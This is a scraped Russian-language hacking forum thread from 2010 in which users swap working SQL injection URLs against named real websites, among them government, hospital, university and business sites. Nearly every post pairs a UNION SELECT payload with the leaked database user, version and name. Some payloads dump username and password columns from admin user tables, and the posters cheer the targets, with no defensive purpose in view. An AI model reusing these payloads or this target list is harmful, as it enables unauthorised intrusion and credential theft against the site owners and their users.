http://www.bia2.com/music-review/review.php?id=-182+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
4.1.22-standard
soltan_review
soltan_review@localhost
http://www.eximin.net/past_news/news_template_sql.asp?newsid=58964+or+58964=(SELEC T+TOP+1+cast(Name+as+nvarchar)+from+Ad)--
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Safmarine ' to a column of data type int.
..::TROYAN::..
29.03.2010, 20:22
http://portal.paraiba.pb.gov.br/index.php?option=com_radio&task=exibi_descricao&id=-1+UNION+SELECT+1,2,3,concat_ws%280x3a,username,pas sword%29,5,6,7,8+from+gov_users--
PR:7
ТИц 10
http://www.themissourigolfer.com/index.php?option=com_business&view=business®ion=37&category_id=-1+UNION+SELECT+1,2,version()--
http://www.mlh.gov.bw/index.php?option=com_departments&id=-1+UNION+SELECT+1,concat_ws%280x3a,username,passwor d%29,3,4,5,6,7,8+from+jos_users--
http://www.culturecrossing.net/basics_business_student.php?id=-1+union+select+1,user(),3,database(),5,version(),7 ,8,9,10,11,12,13,14--
User: michael@localhost
Database: cultural
Version: 5.0.90
PR6
xor[jmp]
30.03.2010, 00:59
http://ihl.enssib.fr/siteihl.php?page=-1+union+select+1,concat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7--
User: root@localhost
Version: 4.1.20
Database: SiteIHL
http://www.stnicholashospital.org/providers/provider_info.php?pp=-142+union+select+1,concat_ws%280x3a,user%28%29,dat abase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38--
User: stnick_cat@localhost
Version: 5.0.89-community-log
Database: stnick_catalog
http://www.film-commission-bayern.de/index.php?Sprache=DE&SeitenID=-62+/*!union*/+/*!select*/+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database% 28%29,version%28%29%29,8,9,10--
User: fff_location_w@localhost
Version: 5.0.32-Debian_7etch12-log
Database: fff_location
Red_EYEs
30.03.2010, 01:06
вот сайт разработчиков http://www.kreazone.ru/
поюзать у них в портфолио, можно смело повеселится.....
http://www.bbtravel.ru/index.php?page_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,DATABASE(), USER(),11,13,14,15,16,17,VERSION(),19,20,21,22,23
http://www.c-avt.com/index.php?parent_id=24&page_id=-1%20union%20select%201,2,3,4,VERSION(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22--
http://www.megaprosto.ru/?page_id=-1%20UNION%20SELECT%201,2,3,4,VERSION(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23--
суперэбл
jecka3000
30.03.2010, 01:27
http://www.besale.ru/offer.php?id=-346+union+select+1,2,3,4,5,6,7,concat(database(),0 x20,version(),0x20,user()),9,10,11,12,13,14,15,16, 17,18,19,20--
5.1.42-log
wwwbesaleru_besale
besale_besale@localhost
http://www.ashludiekitchens.co.uk/offer.php?id=-107+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6--
5.0.89-community-log
web54-aslud
web54-aslud@localhost
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+concat(version(),0x20,database(),0 x20,user()),2,3,4--
5.0.89-community
stmary_stmarys
stmary_stmary@localhost
http://www.elnaggarzr.com/en/main.php?id=-59+union+select+concat(version(),0x20,database(),0 x20,user())--
5.0.32-Debian_7etch10-log
zr
zr_en@72.29.20.2
http://regulus2.azstarnet.com/mediaskins/main.php?id=-2220+union+select+concat(version(),0x20,database() ,0x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21--
4.1.8a-log
videoskins
read@localhost
xor[jmp]
30.03.2010, 02:07
http://www.qsrweb.com/storefronts.php?sf_id=-1+/*!union*/+/*!select*/+concat_ws%280x20a,0x73716c696e6a,database%28%29,u ser%28%29,version%28%29%29--
User: qsrweb@localhost
Version: 5.0.77-log
Database: sitedb
http://www.pizzamarketplace.com/storefronts.php?sf_id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29,2,3,4--
User: pmc_web@localhost
Version: 5.0.77-log
Database: sitedb
http://www.aftrot.com/aftrot/index.php?pageid=-3+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws%280x 3a,user%28%29,database%28%29,version%28%29%29,12,1 3,14,15,16,17,18,19,20--
User: dbaftrot@localhost
Version: 5.0.51a-24+lenny2+spu1
Database: dbaftrot
xor[jmp]
30.03.2010, 09:46
http://www.dixiememetier.com/php/public/carte.php?c=-1+union+select+1,2,concat_ws%280x3a,user%28%29,dat abase%28%29,version%28%29%29,4,5,6--
User: dixiemem@10.0.75.44
Version: 5.0.90-log
Database: dixiemem
http://eilatfilmfest.com/film_eng.php?filmid=-67+union+select+1,2,3,4,5,6,concat_ws%280x3a,user% 28%29,database%28%29,version%28%29%29,8,9,10,11,12 ,13,14,15,16,17,18,19,20--
User: eilatfil_felini@localhost
Version: 4.1.22-standard-log
Database: eilatfil_main
http://www.gsmarin.com/batvis.php?userindex=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws%280x 3a,user%28%29,database%28%29,version%28%29%29,12,1 3
User: gsmarin@localhost
Version: 4.1.22-standard
Database: gsmarin_marinesalg
http://www.d1.ru/website/index.php?sel=-191+and+1=2+union+all+select++aes_decrypt(aes_encr ypt(concat_ws(0x3a,version(),user(),database()),0x 71),0x71)--
version: 5.0.82-log
user: d1ru@troy.mplik.ru
database: d1ru
jecka3000
30.03.2010, 16:11
московская торгово-промышленная палата
http://www.mostpp.ru/news.php?&id=-6485+union+select+1,2,3,4,5,6,7,concat(version(),0 x20,database(),0x20,user()),9,10--
http://82.200.160.90/kaz/projects/projectsditail.php?recordID=-6+union+select+1,2,3,4--
user() : root@localhost
version() : 5.0.45
database() : enbek
/admin (access denied!??)
http://kazembassy.ru/press_service/news/?newsid=-3688+UNION+SELECT+1,2,unhex(hex(concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os))),4 ,5,6--%20+
Database Version: 4.1.13
Database name: kazemb
User name: kazemb@server1.barik.pp.ru
Os : suse-linux
http://www.olympic.kz/singlevideo.php?id=6941337+union+select+1,2,3,4,5, 6--
version() : 4
column 3 (page title)
_http://www.politcom.ru/article.php?comments&id=-9155'+union+select+1,2, 3,4,ve rsion(),6,7/*
http://www.redbookkz.info/list.php?taxon=303+and+1=0+union+select+1,2,3,4,5, 6,7,8,9
user() : redbookk_redbook@localhost
version() : 5.0.90-log
database() : redbook_redbook
columns 5,7 (title)
xor[jmp]
30.03.2010, 18:41
http://www.kahles.at/index.php?sprache=1&menu=-28+union+select+1,2,3,4,5,concat_ws%280x3a,user%28 %29,database%28%29,version%28%29%29,7,8,9,10,11,12--
User: ka000305@ubh01-out2.ubh.inode.at
Version: 4.0.27inode
Database: ka000305_01
http://www.culturecrossing.net/basics_business_student.php?id=-1+union+select+1,concat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,13--
User: michael@localhost
Version: 5.0.27
Database: cultural
http://www.caucaz.com/home_de/news-rubrique.php?theme_news=-1+union+select+1,2,3,concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,5,6,7,8,9,10,11,12--
User: caucazcaucaz@10.0.84.21
Version: 4.0.25-standard-log
Database: caucazcaucaz
jecka3000
30.03.2010, 18:45
еще один правительственный сайт
http://wildlife.utah.gov/hotspots/detailed.php?id=-1155149030+union+select+1,concat(version(),0x20,da tabase(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23--
5.0.89-community
wildlife_hotspots
wildlife_wild222@localhost
http://www.ombudsman.mos.ru/index.php?page=contaAct'+union+select+1,2,3,4,5,6, 7,8,9,10,user()+from+information_schema.tables/*
ombudsman@localhost
xor[jmp]
30.03.2010, 19:40
http://handboog.net/index.php?cat=product_detail&pid=650+union+select+1,2,3,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29--
User: outdoor@localhost
Version: 4.1.22
Database: outdoorpro
http://www.furnitalia.com/item1.php?id=4+union+select+1,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
User: dbo214872500@74.208.16.175
Version: 5.0.81-log
Database: db214872500
http://www.praktijkopleiden.nl/index.php?p=2&view=artikel&id=929+union+select+1,2,3,4,5,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,7,8,9,10,1 1,12,13--
User: cmsPto@intweb2.sebastian.nl
Version: 5.0.32-Debian_7etch6-log
Database: cmsPto
root_sashok
30.03.2010, 21:39
http://www.outstretch.net/donationsstore/payments.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7--
Username: dbo311978282@74.208.16.85
Database: db311978282
Version: 5.0.81-log
http://www.montereyboats.ru/main.php?cat=8&prod=406+union+select+1,2,3,concat_ws(0x3a,user(), database(),version()),5,6,7,8,9,10,11--
Username: acmotors@localhost
Database: wwwmontereyboatsru
Version: 4.1.25-log
http://www.clothingtrain.com/index.php?mod=products&cat=1+union+select+1,2,3,concat_ws(0x3a,user(),dat abase(),version()),5,6--
Username: yentablo_ct@localhost
Database: yentablo_ct
Version: 5.0.89-community
http://www.fundacioculturalmontcada.cat/index.php?aptd=3&id=46+union+select+1,2,concat_ws(0x3a,user(),datab ase(),version()),4,5--
Username: usr01db01fcm@localhost
Database: db01fcm
Version: 5.0.77
http://www.tsn.co.za/jobdetail.php?type=category&cat=4&id=405+union+select+1,2,concat_ws(0x3a,user(),data base(),version()),4,5,6,7--
Username: tsndb@127.0.0.1
Database: tsn
Version: 4.1.19-community-max-nt
xor[jmp]
30.03.2010, 22:04
http://www.cageprisoners.com/campaigns.php?id=-630+/*!union*/+/*!select*/+1,2,3,concat_ws%280x3a,user%28%29,database%28%29, version%28%29%29,5,6,7--
User: cagepris_user@localhost
Version: 5.0.89-community
Database: cagepris_cms
http://der-antiaggressionstrainer.com/galerie/view.php?id=-2+union+select+1,concat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14--
User: patrik@localhost
Version: 5.0.45
Database: galerie
http://www.kromestudios.com/games/overview.php?id=1+union+select+1,2,3,concat_ws%280 x3a,user%28%29,database%28%29,version%28%29%29--
User: root@localhost
Version: 5.0.45
Database: kromeweb2
root_sashok
30.03.2010, 22:19
http://www.tunisieholidays.com/annonces/resultannonce.php?ville=9&cat=2+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,database(),version()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30+--+
Username: cm146411@81.88.49.28
Database: cm146411
Version: 4.1.23-pro-gpl-log
Жирненький сайтик.
http://www.lorenz-electronics.com/news_dettaglio.php?modulo=NEWS&lingua=eng&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5--
Username: lorenz@ns0.yepa.com
Database: LORENZ
Version: 5.0.45
xor[jmp]
30.03.2010, 22:27
http://www.relo.sk/file.php?file=-58+union+select+1,2,3,concat_ws%280x3a,user%28%29, database%28%29,version%28%29%29,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23--
User: relocation_123@localhost
Version: 5.0.51a-log
Database: relocation
http://www.toshiba-klima.at/produkt/artikel.php?id=420+union+select+1,2,3,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Неплохой сайтик ^_^
User: root@localhost
Version: 5.0.45
Database: aircond
http://www.musiconline.com.br/videos/index.php?ida=1583+union+select+1,2,concat_ws%280x 3a,user%28%29,database%28%29,version%28%29%29,4--
User: mol_admin@localhost
Version: 5.0.90-community-log
Database: mol_musiconline
root_sashok
30.03.2010, 22:30
http://www.imagemodelspanama.com/modelos.php?cat=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3--
Username: nissitec_agent@localhost
Database: nissitec_image
Version: 5.1.45-log
http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--
version:MySQL 5
xor[jmp]
30.03.2010, 22:38
http://www.gtk.fi/slr/author.php?id=-1+union+select+1,2,concat_ws%280x3a,user%28%29,dat abase%28%29,version%28%29%29,4,5,6,7,8--
User: slr@localhost
Version: 5.0.77
Database: slr
http://npiw.punjab.gov.pk/wc_view_progress_print.php?wcId=-27571+union+select+1,concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--
User: guest_npiw@localhost
Version: 5.0.51b-community-nt
Database: watercourse
http://www.indstate.edu/news/news.php?newsid=-2170+union+select+concat_ws%280x3a,user%28%29,data base%28%29,version%28%29%29,2,3,4,5,6--
Норм домен ^_^
User: news@localhost
Version: 5.0.45-community-nt-log
Database: news
root_sashok
30.03.2010, 22:43
http://digitaltouchgroup.com/categories.php?cat=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())--
Username: mohammed_digital@localhost
Database: mohammed_digitaltouchgroup_db
Version: 5.0.77-community
http://www.plockagaleria.com/konkursy/cat.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5--
Username: pgs@77.55.98.104
Database: pgs
Version: 5.0.90-log
http://www.parfymelle.no/style_two.php?cat=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4--
Username: parfymelle@217.18.205.134
Database: parfyme
Version: 5.0.22
xor[jmp]
30.03.2010, 22:51
http://www.cyclingconsulting.com/ciclistas_maqueta.php?ciclista_cod=-32+union+select+1,concat_ws%280x3a,user%28%29,data base%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14,15--
User: DBUA679@vs1003.euddene.net
Version: 5.0.32-Debian_7etch5-log
Database: DBA869-ciclistas
http://www.draytek.com/user/SupportAppnotesDetail.php?ID=-102+union+select+1,2,concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,4,5,6,7,8,9--
User: draytekdb_user@localhost
Version: 5.0.67-log
Database: draytekdb
http://www.msm-musik.de/index.php?page_id=-18+union+select+concat_ws%280x3a,user%28%29,databa se%28%29,version%28%29%29--
User: _msm@localhost
Version: 4.1.22
Database: 10045_msm
root_sashok
30.03.2010, 22:59
http://www.opwegmetenergie.nl/wijzig.php?cat=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--
Username: nove@localhost
Database: nove
Version: 4.1.22-log
http://www.ganeshaonline.com/ViewItems.php?itemid=730+union+select+1,2,concat_w s(0x3a,user(),database(),version()),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
Username: ganesha1@66.70.19.249
Database: ganeshaonline
Version: 5.0.41-community
xor[jmp]
30.03.2010, 23:08
http://www.ctaholidays.net/beta/holiday_details.php?id=1225589959+union+select+1,2 ,3,4,5,6,7,concat_ws%280x3a,user%28%29,database%28 %29,version%28%29%29,9,10,11,12,13,14,15--
User: sercanak_main@localhost
Version: 5.1.45-log
Database: sercanak_ctav2
http://www.graffitiwallpaper.com/index.php?wallpaper=-44+union+select+1,2,3,concat_ws%280x3a,user%28%29, database%28%29,version%28%29%29,5,6,7,8,9,10--
User: graffiti_wall@localhost
Version: 4.1.22-standard
Database: graffiti_cms
http://financialselfserviceworld.com/products.php?prod_id=-1794+/*!union*/+/*!select*/+concat_ws%280x3a,0x73616e656b736f736f,user%28%29, database%28%29,version%28%29%29--
User: atmmarketplace@localhost
Version: 5.0.77
Database: sitedb
xor[jmp]
30.03.2010, 23:14
http://hospitalityselfserviceworld.com/storefronts.php?sf_id=-114+/*!union*/+/*!select*/+concat_ws%280x3a,0x73616e656b736f736f,user%28%29, database%28%29,version%28%29%29--
User: atmmarketplace@localhost
Version: 5.0.77
Database: sitedb
http://www.mmblaw.com/newsevents.php?NewsID=66+union+select+concat_ws%28 0x3a,0x73616e656b736f736f,user%28%29,database%28%2 9,version%28%29%29--
User: pnc_morganmiller@localhost
Version: 4.1.22-community-nt
Database: pnc_morganmiller
http://www.rocautos.com/vehicle_detail.php?item=-156372+union+select+1,2,3,4,5,6,concat_ws(0x3a,use r(),database(),version()),8,9,10,11,12,13,14,15--
User: autoshop2307@thunderbird.dreamhost.com
Version: 5.0.67-userstats-log
Database: autoshop2107
http://www.climamaison.com/chauffage.php?K=-94+union+select+1,2,concat_ws%280x3a,user%28%29,da tabase%28%29,version%28%29%29,4--
User: climamaisoncom@localhost
Version: 5.0.32-Debian_7etch12-log
Database: climamaisoncom
http://www.amnh.org/programs/programs.php?event_type_id=1+union+select+concat_w s%280x3a,user%28%29,database%28%29,version%28%29%2 9--
User: com_dbpublic@localhost
Version: 5.0.41-community-log
Database: com_calendar
Вывод в исходнике.
http://www.csr-asia.com/index.php?cat=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29--
User: csrasia_db1@localhost
Version: 5.0.67-community
Database: csrasia_db1
http://www.receptur-gdventura.es/v2/publico/actividad_ficha.php?actividad_id=-23+union+select+1,concat_ws%280x3a,user%28%29,data base%28%29,version%28%29%29--
User: usuario@dl03.dinaserver.com
Version: 5.0.51a-24+lenny2
Database: activasol_receptur
http://www.fotomundo.com/nota.php?id=1147+union+select+1,2,3,4,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,6, 7,8,9,10,11,12,13,14,15--
User: fotomundo.com@localhost
Version: 5.0.77
Database: fotomundo_com
http://www.indianminiature.in/enlarge.php?cid=-448+union+select+1,2,3,4,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,6,7,8,9,10,11,1 2,13,14,15,16--
User: paintingnew@localhost
Version: 4.1.22-community-nt
Database: paintingnew
http://www.mediendenk.com/images/gallery.php?AID=-0000004023+union+select+concat_ws%280x3a,user%28%2 9,database%28%29,version%28%29%29--
User: ftp53845@server029.webpack.hosteurope.de
Version: 5.0.32-Debian_7etch1~bpo.1-log
Database: mediendenk_com
http://ershad.byethost8.com/linktop.php?id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29,2,3,4,5,6,7--
User: b8_5033612@209.190.85.138
Version: 5.1.41-3
Database: b8_5033612_linkbox
Выводил через сипт (1 поле).
https://secure.clickitgolf.com/coupon.php?courseId=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29--
User: clickitg@localhost
Version: 4.1.20
Database: clickit2
http://www.asiayogaconference.com/faculty/index.php?faculty_id=32+union+select+1,concat_ws%2 80x3a,user%28%29,database%28%29,version%28%29%29,3 ,4,5,6,7,8,9,10--
User: root@localhost
Version: 4.1.22-log
Database: ayc2009
http://www.happypuglia.com/disponibilita.php?Cod=-1+union+select+1,2,concat_ws%280x3a,user%28%29,dat abase%28%29,version%28%29%29--
User: pugliavacan4764@web-a1.seeweb.it
Version: 4.0.18-standard
Database: pugliavacan4764
http://www.onthetable.co.uk/product.php?product=Culinary_Concepts_Corn_on_the_ Cob_Skewers&sproductID=57+union+select+1,2,3,concat_ws%280x3a, user%28%29,database%28%29,version%28%29%29,5,6,7,8--
User: mysql50847@10.41.0.5
Version: 5.0.77
Database: db50847
P.S Скули нашёл ещё неделю назад, записывал всё в блокнот, на боянность проверить ещё не успел но позже почищу.
root_sashok
30.03.2010, 23:15
http://uis.sashaal.net/product.php?cat=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5--
Username: v2v@localhost
Database: v2v
Version: 5.0.51a-24+lenny1-log
Украинские Информационные Системы.
http://www.pbphotography.nl/portfolio.php?cat=48+union+select+concat_ws(0x3a,1 111,user(),database(),version())--
Username: pbp@localhost
Database: pbp
Version: 4.1.22-standard
http://giopro.gr/main.php?cat=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5--
Username: giopogr1_user@localhost
Database: giopogr1_giopro
Version: 4.1.22-standard
http://www.richmond.com.sv/detalle.php?id=9+union+select+1,2,concat_ws(0x3a,u ser(),database(),version()),4,5,6--
Username: estudiodinamo@64.13.192.10
Database: db7589_richmondsv
Version: 4.1.25-Debian_mt1
http://mybulgariayoung.org/gallery.php?l=bg&cat=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7--
Username: mybulgariayoung@localhost
Database: mybulgaria_db
Version: 5.0.51a-log
http://www.recrapro.nl/index.php?cat=product_detail&pid=768+union+select+1,concat_ws(0x3a,111,user(),d atabase(),version()),3--
Username: outdoor@localhost
Database: outdoorpro
Version: 4.1.22
Отдохнул и размахнулся за пару часов :D
CyberHunter
31.03.2010, 00:04
http://onlife.ru/curiously.phtml?id=-122+union+select+1,2,3,4,5,6,7+--+
Version: 5.0.89-community
User: onliferu_main@localhost
Database: onliferu_main
Вот нашел еще:
http://www.clinicas.ru/?id=122
и
http://www.piro.ru/show_katalog.php?id=-22
но до ума довести не смог :(
root_sashok
31.03.2010, 00:05
http://www.fusion-aarhus.dk/katalog.php?cat=1+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4--
Username: web0@localhost
Database: usr_web0_1
Version: 5.0.32-Debian_7etch6
http://www.lacumbre.gov.ar/index.php?put=servicios-cat&ls=0&id_subrubro=16+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version()),6,7,8,9,10,11,12,13, 14,15,16,17,18,19--
Username: acumbre_sitio@localhost
Database: lacumbre_sitio
Version: 4.1.22-standard
http://score.dnr.sc.gov/deep.php?subject=5&topic=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5--
Username: score@localhost
Database: score
Version: 4.1.20
http://www.heber.ca.gov/section.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15--
Username: kenwood@68.178.254.188
Database: kenwood
Version: 5.0.67.d7-ourdelta-log
Gov идут отлично.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot